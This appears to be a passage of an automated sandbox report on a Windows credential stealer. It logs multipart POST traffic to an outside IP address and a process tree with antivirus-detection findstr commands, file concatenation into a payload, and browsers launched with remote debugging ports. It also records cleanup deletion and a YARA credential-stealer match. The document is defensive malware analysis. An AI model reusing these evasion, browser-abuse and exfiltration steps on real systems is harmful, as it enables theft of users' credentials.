                                                                                                                                                                                                                                                                                                                          Data Ascii: f/Z------IEUKNOH47GVAAAAIM7GL--
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:28 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          46192.168.2.550137195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:29 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZ
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------FCB1VK689RQIEUAIMOPZCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:29 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          47192.168.2.550142195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:30 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----NYC2NO8Q1DJEU3O890R9
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:30 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 59 43 32 4e 4f 38 51 31 44 4a 45 55 33 4f 38 39 30 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 32 4e 4f 38 51 31 44 4a 45 55 33 4f 38 39 30 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 4e 59 43 32 4e 4f 38 51 31 44 4a 45 55 33 4f 38 39 30 52 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------NYC2NO8Q1DJEU3O890R9Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------NYC2NO8Q1DJEU3O890R9Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------NYC2NO8Q1DJEU3O890R9Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:31 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                                                          Start time:11:22:01
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\mNPTwHOuvT.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\mNPTwHOuvT.exe"
                                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                          File size:1'352'826 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:2DB319E8BFD0B40BB3AC999CF4E6670C
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                                                          Start time:11:22:03
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd
                                                                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                                                                          Start time:11:22:03
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                                                                          Start time:11:22:03
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                                                                          Imagebase:0x6c0000
                                                                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                                                                          Start time:11:22:04
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                                          Imagebase:0xf40000
                                                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                                                                          Start time:11:22:05
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                                                                          Imagebase:0x6c0000
                                                                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                                                                          Start time:11:22:05
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                                          Imagebase:0xf40000
                                                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                                                                          Start time:11:22:05
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:cmd /c md 424372
                                                                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                                                                          Start time:11:22:06
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:findstr /V "SYDNEY" Webmasters
                                                                                                                                                                                                                                                                                                                          Imagebase:0xf40000
                                                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                                                                          Start time:11:22:06
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars U
                                                                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                                                          Start time:11:22:06
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:Fine.com U
                                                                                                                                                                                                                                                                                                                          Imagebase:0x1d0000
                                                                                                                                                                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                                                                          Start time:11:22:06
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                                          Imagebase:0xcc0000
                                                                                                                                                                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                                                                          Start time:11:22:51
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                                                                          Start time:11:22:52
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2136,i,8109458833846669920,3799157795582322690,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                                                                          Start time:11:23:03
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                                                                          Start time:11:23:04
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                                                                          Start time:11:23:04
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2636,i,9989964858448437683,7276448006416970456,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                                                                                          Start time:11:23:05
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                                                                          Start time:11:23:09
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3672 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                                                                                          Start time:11:23:09
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5256 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                                                                                          Start time:11:23:30
                                                                                                                                                                                                                                                                                                                          Start date:12/01/2025
                                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exit
                                                                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                          Has exited:true

